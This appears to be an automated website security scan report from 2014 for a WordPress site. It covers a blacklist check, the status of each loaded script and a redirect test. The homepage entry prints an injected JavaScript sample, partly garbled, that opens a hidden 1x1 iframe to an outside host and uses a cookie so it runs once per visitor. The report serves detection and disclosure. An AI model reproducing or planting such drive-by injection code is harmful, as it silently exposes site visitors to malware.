Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=scii2.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://scii2.com/ | 200 OK Content-Length: 21745 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() {
var zpff = document.createElement('iframe'); zpff.src = 'http://zydahle.com/count10.php'; zpff.style.position = 'absolute'; zpff.style.border = '0'; zpff.style.height = '1px'; zpff.style.width = '1px'; zpff.style.left = '1px'; zpff.style.top = '1px'; if (!document.getElementById('zpff')) { document.write('<div id=\'zpff\'></div>'); document.getElementById('zpff').appendChild ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://maps.google.com/maps/api/js?sensor=false | 200 OK Content-Length: 4898 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js | 200 OK Content-Length: 9759 Content-Type: text/javascript | clean |
http://scii2.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/plugins/instagram-for-wordpress/js/jquery.easing-1.3.pack.js | 200 OK Content-Length: 6717 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/plugins/instagram-for-wordpress/js/jquery.cycle.lite-1.5.min.js | 200 OK Content-Length: 4376 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/plugins/instagram-for-wordpress/js/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/plugins/instagram-for-wordpress/js/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1279 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/themes/rhea/js/jquery.ui.js?ver=1.01397993068 | 200 OK Content-Length: 46613 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/themes/rhea/js/colorpicker.js?ver=1.01397993068 | 200 OK Content-Length: 17175 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/themes/rhea/js/fancybox/jquery.fancybox-1.3.0.js?ver=1.01397993068 | 200 OK Content-Length: 27766 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/themes/rhea/js/jquery.easing.js?ver=1.01397993068 | 200 OK Content-Length: 8097 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/themes/rhea/js/jquery.nivoslider.js?ver=1.01397993068 | 200 OK Content-Length: 25235 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/themes/rhea/js/gmap.js?ver=1.01397993068 | 200 OK Content-Length: 6052 Content-Type: application/x-javascript | clean |
http://scii2.com/wp-content/themes/rhea/js/jquery.validate.js?ver=1.01397993068 | 200 OK Content-Length: 25365 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: scii2.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Apr 2014 11:24:27 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://scii2.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: scii2.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Apr 2014 11:24:27 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://scii2.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: scii2.com
Referer: http://www.google.com/search?q=scii2.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: scii2.com
Referer: http://www.google.com/search?q=scii2.com
Result:
The result is similar to the first query. There are no suspicious redirects found.